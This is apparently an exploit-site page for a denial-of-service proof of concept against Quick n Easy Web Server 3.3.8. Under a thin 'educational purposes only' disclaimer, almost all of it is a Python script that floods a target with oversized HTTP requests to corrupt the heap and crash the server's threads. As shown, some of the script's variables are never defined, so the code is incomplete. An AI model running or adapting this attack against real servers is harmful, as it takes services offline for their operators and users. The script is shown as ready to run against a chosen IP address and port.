Quick n easy web server 3.3.8 denial of service (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-02-24 |
Type : dos |
Platform : windows
This exploit / vulnerability Quick n easy web server 3.3.8 denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
# Date: 2019-12-25
# Author: Cody Winkler
# Vendor Homepage: https://www.pablosoftwaresolutions.com/
# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html
# Version: <= 3.3.8
# Tested on: Windows 10 x64 (wow64)
# CVE: N/A
#!/usr/bin/env python
"""
Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8
[+] Usage: python quickwww_heap338.py <IP> <PORT>
$ python exploit.py 127.0.0.1 80
"""
from __future__ import print_function
import socket
import sys
import re
print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8")
i = 1
while( i < 1500):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(http_req)
print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r')
sys.stdout.flush()
if re.search(crashed, s.recv(1024)):
print(" "*50)
print("[+] Threads have exited BAADF00D with %d requests!" % i)
s.close()
exit()
s.close()
i = i+1
except Exception, msg:
print("[-] Something went wrong :(")
print(msg)